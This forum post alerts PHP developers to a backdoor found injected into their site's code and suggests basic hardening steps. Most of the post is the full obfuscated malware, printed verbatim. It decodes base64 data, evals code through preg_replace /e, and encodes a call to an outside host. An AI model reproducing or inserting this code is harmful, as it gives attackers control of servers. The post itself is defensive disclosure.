QT is better than VS
- Joined
- Jul 29, 2009
- Messages
- 908
- Reaction score
- 389
I WOULD LIKE TO ALERT ALL DEV,s ADMIN's as i found out this bunch of php code injected inline in our php code..
history::
at the first time i just ignore it since im developing xcache technology for fast loading site i thought mycode was generating this line. BUT!!it makes me crazy when i reverse this obfuscated code. and oh duck. its a function! what it does?
FULL ROOT ACCESS + terminal command..NO JOKE!!! !!
i will not share the decoded part of this cause it might harm some others.
SOLUTION:
CHMOD /read mode/
.htaccess to prevent access directories
.input $_POST $_GET filter
.sanitize url
tagalog:
kaya pala madali lang magshare ng rancp kasi di mo nmn gawa nakaw mo lang.
HERE IS THE INJECTED CODE!!IN LINE 1
history::
at the first time i just ignore it since im developing xcache technology for fast loading site i thought mycode was generating this line. BUT!!it makes me crazy when i reverse this obfuscated code. and oh duck. its a function! what it does?
FULL ROOT ACCESS + terminal command..NO JOKE!!! !!
i will not share the decoded part of this cause it might harm some others.
SOLUTION:
CHMOD /read mode/
.htaccess to prevent access directories
.input $_POST $_GET filter
.sanitize url
tagalog:
kaya pala madali lang magshare ng rancp kasi di mo nmn gawa nakaw mo lang.
HERE IS THE INJECTED CODE!!IN LINE 1
Code:
/*versio:3.01*/$II1I=114896;if (!function_exists('IIIllllI')){$GLOBALS['II1I'] = 'G=gaW5pX3NldAzDYWxsb3dfdXJsX2ZvcGVuLVZGlzcGxheV9lcnJvcnMAQcZnRwL2Z0cDIwMTMxMTE0My4wMQNSWxJMWxsSTExSTFJaHR0cDovLw?fSFRUUFMmOb2Zm$faHR0cHM6Ly8VSFRUUF9IT1NUCypp!dW5pb24(k_K_iJCc2VsZWN0IUkVRVUVTVF9VUkk&;;NruU0NSSVBUX05BTUUNUVVFUllfU1RSSU5H^^TPw}}ZGV0ZXJtaW5hdG9yJDnLgX?ULmxvZwjpSFRUUF9ZX0FVVEgFgYmFzZTY0X2RlY29kZQ!JT}!hdmVyc2lvJmLQ{&MLXBocAYnlSFRUUF9FWEVDUEhQ&!}b3V0LbPb2sCqSFRUUF9VU0VSX0FHRU5ULAkNYZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAsyYQ{^ oc2V6cW8ubmV0%PZmFzdGFkZHouY29tL3czLnBocD91PQRJms9JnQ9cGhwJnA9FbbUJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYyMXZtMGdRL2l1YlZSU0JSREJnTzdiajQrUW81MTZRVWhNY3AxTFZSc2pGUzQyS3dRTGNwSXJ5MzI5bWQzbExjSy81RW50bjUyWG41Wm5IVVVpVWt3MExvNFJ0RkxwaEJjdDJVYkl1MG95cTZndUpRQndla3FDSTBzUm56MUZlNUlyak9ESDhPVXBmSTZhaDRyVlpsRVIrem9wYVpnNDFZaGtxM0ZDbkhlTCtDQ1FURUJzZ2ZpV2xDL0xVVDFqaGh5d05sVlBQTUR6UDA4alpxZWU1aHVjU215d2VibTlWOGtMcWsxMFVaR2tSN1poU1pBY0d4akpXSExLRU5FMTB1ZmpPaWpDS21ZS1dYTmZRd0tUaEdhNm5jdU1HNklGeEdoeXltRTdKcVdOQzVDYWNTSmxPZlhoU0FTSk1FSDhlR0ZUb09vN1RKeCtVL0REZHM0U3F4QVlySnNXWVpXQXpkSXUzL1NCTkNwWkFRdW0yS1BhWHZSNGxPcEh4OEU4OElKM1FzeWM3L0I1US9nd1c1NnlyS0RKRUxNYXBFNXV4NDBDME0zbXFnT29wMnZXTTFodWdKT2tlWHdGQ3lGTmJ5SjVaQUtLWlZGU2tXWTFjUHl4djNidVZELzgwOGdleEJ3Y00vYmlkbS9uVlAvT2xSc0kxdk8yM041ZnoxY055c1ZwZUxlNC9vSVlzK1hHRmEzZXhtRit2VnM3SHVmdXcwc2dGSmdKNlVCUnpKcDlkNnFFcHJMZ2Z4R25PR3FlWWNMYmJGNzhVcVF4cHJzMVFPbjB0cXl0UHkwcnhWdVU5aU83Q1BBMStZRi9VWFRmbW5ZZk43SWtXZEEwNEdVcWZaZjhLTXhDcks5eVI5a1JBMk9IK2dFMVFqZ3o5ZDc0aUw3SUtyMVRITXVRL3lNMXFkZGN6ZFFNT3ZtWmZFL2gzaytiRkpZRVBMektrVnk3Z2FZcE5lQXU0dUx1NTg5MTduZmFvamg4L3paZjNqcnZvY1BxUXMrejg2anYwOUNVNEYvcmNYbW56YVlzamQ5STE1UEpGS2prN0k4cWJvU2JudGZndllxbDFOblRNS3N4U0l3clRHdk5CbVlXeWloVUc4QzV4c1JMc2VSK25HNmJRS2ppdE5BbjNEZ2xDbGJ6OXhYaXNRU1hhZGVueGU5em42M3VjU1E4RlpFa1JwZURGZHVHL0MyOWd3VFlsOUxOUGRTblU2U1YrNW5KWm9CWnc3YmQ3bU5qc0o4dXdOV05zelJwVlR2MzcrUkpLODBXS0hsR1ZaODMxN0FwMmh4T095cnlCREtoMkxSbE41SFNnd0dzSXhoZVFVeWx4V3lxbVlmRUZJSG8xeW5uV3lqRHFXK1pBSXlQMXNkd21zK05YeUlsTjZrTUwxc3RBRlhqOHhyRUZ3WnFtVExrVTYzWmVaRVVLK0F2NTZYSXlNTEU1VkN4bm1HWnNIV3hod0h3Y2xIVXVBY3V3LzY3cmc4R0N5WDJLemNVUHRjWjJHMlBFQ0FObzRZdFVmMnpFT0RMNWNxc1IrNml0RVR4MC9HZTJYaUVxNWVSb3FzZFlrQ0htR2hIanVKeGozenV4WmZTRkdBdDZ0SjZXT2VFTjhmOU85RVkxclQ0a3pGSmhOWFE1TGsxTzJ4T0VTN0lBM1BVM1VjWUNvQ1MvRkw3ZUFHRE4ySWJEWkEwUTRmc2ZuTnU1NzZ2NlA4NFN3TjVkZmdZUGQxZkxLL2c0NWZqcjhtMStsV1hyWHdxaHZRMzcyY3UzT3hoZTJpdDIrNTRld2lZK1B5VFJjMzNrWE0vTGt6cGl1dnA0UngvYkovUHFhTDc0MUx4UmZvV29XaWRTZ2Z0QjZ4VjVPQUM0ckRkK0lSNU1nUnpKcCtwVVhLMitQdTNQSlhub0NhWDhpRFNBTG1jZ2EvVzhUQWgyUFc2cjJKVE5mdEpZY2JGa0V2eWpibmRtVmxDZjNIL0tvbUw5RGJsVVN4T0RRVUloRHFma0cvai9VYUprdlM3eDJwUTNOaCtSdU42T0NQWUFMeTlFME5PYVBGb0RpL2RMeVI3TENVTTkwTFJMUk9oQ2dXcEVPRThDZWhUYnM5MW1XUHJVNWJLVCtLaExPRVQ0QXp3SHlyWmhkbGRiNm5Wd0Z5WjJ1aTZ0VDM4VGZXVlNzcEk0NWhTelBHM2F2QkRvZkFSQXJkRkF2TXEycFZ1NUkySDExVEJpVFJBQmNUdUsxU00zVEd0UDFRUWRDZnhZMWNwTlVRZlR0NGJpZ1dLNU5BUjlBNk1zdVl1RGE4aXhaUmhkWWZmN0ZaVEFUd2oyY3gyWFduOFlJNkx3QUdLc1R5NGd0cjRxdXVJNUtoVFJJQkFxMGxwSTdnZmttSnpRbTBCUEVBZC92elg2STROdnpOYldLT2xEZld1Q3QxcUJUQ0NRSWF3dk1XWW1sTlo4czFORUNGb2xQYkZ0SHAyWUhxZ2hwNmloNEl0SGU2TGhjekRrblNkV3RTZVl6dXlBRTRXYW5UdXhtZ1prY3pqSGZJalJONUJyNUY4cUVKRUNXSW1JVVg0UjF1RUxKM1VWMFJLSzBqMmsyMTRCZVd2TmZZa1k0cGRYMWYxWS9TSTlCRnVsT1JFQWpFRjgyREEvVFFMV2tyUW1YaFFXZm1haE56SFZRTnZqQ3U4YjZSbHhBdERNR0M1V3MyclpkMEZJOG9HWTBraWtQT0lQNVFTYk5CYmRZSXhlQm1JODRGWmRzQ0hTcFVFRkRFM0JCUS9zL1VRTkxha2lacENqQkdxRHd6ZS9Zc1dqZ2F6V1AyU25YVWtWNkN0L21oeEhKc210L2dPdWs1eWQiKSkpOw#(cHJlZ19yZXBsYWNlvDJ';function IIIllllI($a, $b){$c=$GLOBALS['II1I']; $d=pack('H*','6261736536345f6465'.'636f6465'); return $d(substr($c, $a, $b));};$II1lIl1II = IIIllllI(3422, 16);$II1lIl1II("/Il11lI1II/e", IIIllllI(526, 2894), "Il11lI1II");};?><?php /*versio:3.01*/$IlIl=114896;if (!function_exists('IIl1llII')){$GLOBALS['IlIl'] = 'EaW5pX3NldA*#YWxsb3dfdXJsX2ZvcGVuFSZGlzcGxheV9lcnJvcnMBYQOZnRwL2Z0cDIwMTMxMTE0My4wMQNQVSWxJMWxsSTExSTFJoXaHR0cDovLwAGSFRUUFMS@Cb2ZmaHR0cHM6Ly8hnlqnSFRUUF9IT1NUVRV_dW5pb24M=GgFCy.c2VsZWN0jUkVRVUVTVF9VUkkrlOU0NSSVBUX05BTUU?cUVVFUllfU1RSSU5HXPwZGV0ZXJtaW5hdG9yY;Lgq#qrvwLmxvZwSFRUUF9ZX0FVVEg)YmFzZTY0X2RlY29kZQso@tdmVyc2lvu#LQ{_tLXBocAwSFRUUF9FWEVDUEhQmb3V0t&Z$Gb2sJHFSFRUUF9VU0VSX0FHRU5UJLA_Z29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAYQ Uotyc2V6cW8ubmV0ZmFzdGFkZHouY29tQr;L3czLnBocD91PQd^JJms9~MEJnQ9cGhwJnA9LJnY9ZZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdHVtMG9RZnBVTmlpS1FDQWJiT0c1OE9IS1V1ZzFTYW1MSHFWUzFFWEx4VXFOaXNBQTNxYUs4KzVuWkN3c3Q3cW4vR0daMjV6N2ZERWxNOUpNTmpaT01iblJ0UXl0YTdKSnNYZVdGWmhndkpBRjJmTWlpS3NtemtENG5aVlhxdnA4NmFlcjd1bU1TeHpidzJEVEprckNrVllNM01FbmZOdUNFTWVsZ0Qxemd2QUcyRGV4WElsV1FwMEZHcXpDbWVheWZMaGJCWW1HYjVPeDBFZGkydlNBZW1UL2MzaHJraFNqS0xvbUt2RXAyVksrS0F3VmhCYTBPUlVhYUlycFVmS05WbktSVVAvVjl4MGw5azV6NllGZnFnelB3QktRVWhHdlJvVWkxQ2FpREgxTW5lSllXZ2tzVnNEQkF6RDBRcUd2ck5NMmZRcmdVeHZtZVpwcEJQSkRpYUdpek1HeUthdkYwR09WWlJUTUlxTGF0cXYxbHI2Y1Jpd2g3MkJNenlDTGEyWk1YZjRzMDVnWk5TOXFWRkdHaXdlejNIYmdJMWs0RlZZZXJRUFZUUmxVK1FFcnlQWHFCSk5EV1l0Sm5HZ0ZyS2k3cVFxeEpyaCtXdDhIZEtvUS9rL3lGN2RFQlRUOHU1MloyOVhhMk5FbThCdC8rZUhJNVd6MHM1NnZsMWZ6K0hkNFFLVDkrNFRxWXoyZlhxNVgvWVJZOHJFd3lNcml2UGt2dlZMZ3Q3NkVvekhnWXBYbEpHMVFNT04zdHE1KzZ1QXhoVm1JMGJmSXFzeXVvTWxPc1ZGa05vcnE0ektQdldCZXE2c1pRMzFETUN6dGdEL0MzV0pqRUZUcGwvZktLeHhldWpyUTdBc3lPOXdkZUJMeGx0UGV6RlhrUldYalZMRXhEK1ozY3JGWjNQY2V5Z2ZDbCtKTEIzMDFlVnBjRUhsNkVTYStNWVV5NFZYWUFLdTV1N3NMZzN0SjZtb1dQSDJmTGV6K1lkeWg5S0dseGZ2VU5hdm9TbFBQN1RKNlUrYlRGbGp2cGFuTGhrVUhPem9qK1MxT1RjOFgraC9RTkZRMExvd3E5MUxEQzZZOVpvMHhqa2NVYUEzaHVzTWpwOHo3Tk4xVFhhdU5NS1JMT0hUS0VLbkg2cy8yb1FDWFpkZHpqNTVqTzE5OXhKajlVRUNXMHdsNndIR05OUVFHOUVCcHRjNko5Q2pWTE1DM3RFcDQ1WHlTb0JWejc3UjQ2dHZoQkM2d2YwT29ZQ2xWT3cvdlpFbEx6V2JBZThTcnozUTY4R25iZE1VTmx6QzRVMnFMQnVSakw3bkNnRUZMRkdGOUFURG1IRllqaU9MYkxCZ0N2MWFSa1VaTm1xRk1PQ0xnd0h1VTBtUjQvUWs0OG9vaDlJQTRsbnJVVkQzRHlPQ0xrZ20xNVpWVlVPZUF2eEtkTHlSQWQ2UnVZempndjZEcmFRb09GMkNqcmtvZ1VlUCtxL0tDeElIS2ZRM0Z4b3FtRWpRWm9NY0lBU3Znc3JqODJiTHh3MlhCVGlIMVVGb1orL0hleVhzRXEvZVJvcUZtdVhJdzFJc1p4UHNPKzM5aDlsazlnWTBLUDVyUGY3N09DK0g4bFZpT2IvY0VicUR3RFJrT1hZaWx5MHU0Z0hKSVY0RzY0U1FvYXdVcnlVK2ZsZ0hEdkFURmJBMFNFNFR2L2RoYUdodlhXWHdMWUI4dFBvT0h1YW5rRmo2enJVd2c1dUh4VkZPdWZPdEY2Ry9xalYyNTMwTHhhcjlydGUxWU1rL2o4a0NYUGl1UmZ6eVJGV2F5dFB0eHBqMjNLckNiTjVoK2JKK1FyV05XaWlBdE1EMHF2bDRjRGdNdDZFMWJjWWMwd3BhdVd4by9XcjAvN2M3RTg5UGlsOGdnM2dpcW53R3ZWdkFnSXEzb1lPRUVnaXYxRWpEaEJaRERMSGkydk03Sjg5U25EcHlLcDFsOXhsMnJjNU1iZ1FzR0pFL0lWOUgrWEtGbVBTM1pzd2dxYnRVaXFwaU9DUGNETEMrSHJxVm9lKzBPSDFZdmNIbVdIc1pHenNEMkpDRjBvVUxjSTh3NU8yOTUwdDNHbFRrc01PNEdQbG9CRGhEL0FjMWpaTnRUcktrdExHZWV5U3JlRTlNa2ZySzlGR256RmhCR0hBWlBVaHN6UkJVZm5Jd0Rhdnhod3J6eFBxQlZyTEFSWHdVaC9ESlk1T0IzNTZCRVRwalduMUlMdU9JaEtwcHdVeXBoQjN4RU9zdUhTWkl6UXlucDN3V1VtOElRWlhXWVBCZ01KSmZBSlFYK3NVM25yTDIxMGJSd1JKbWxRd01XQndhdmlPYWwwWGlCc2Uxamd1dlFPZDB3MjVlUU8rT2VwTVJpNWJHSzJwb1pjSDlTcDhRaEQwalFFWSszQytHSnRob0RQUGkzYWN3Qk5NR3Z1aWVjeDYzanFnTUxNaS9tK2VMUW1HanFIUS96bU1rUXg4V1Z4ZXNDT3dwdWRNN0h1QnR6bXNJK3BMblREY28zN2x3R0xTSVZiQ2JOUnZIRHA4TUtXdW5yUjRoZU5pUXkzdDRMbHJkWDNFakg0bDFkZC9aajlLajlFVzczWkVRQ01VWHJZMEREUEl0cml0RHFlSnhZK3MxQ2JpQjM0VitPOUNvL0x0c05XeEVaODhNak8rdFVJc1draXBqUUNLVWg4by9UNVJxbEVqckc3aDlnZTdKUksyUEROR0t0VkFvTml1R3p1ZG5XVTY5UlhNT1RpSTg3Qnd2ajFLNVk1RGN1cStwQ2RkQVdWbzYvNE5EbU9UR0szK2c5REhKbUEiKSkpOwcHJlZ19yZXBsYWNl';function IIl1llII($a, $b){$c=$GLOBALS['IlIl']; $d=pack('H*','6261'.'736536345f6465636f6465'); return $d(substr($c, $a, $b));};$I111II1lI = IIl1llII(3401, 16);$I111II1lI("/IllI111lI/e", IIl1llII(523, 2878), "IllI111lI");};
Attachments
You must be registered for see attachments list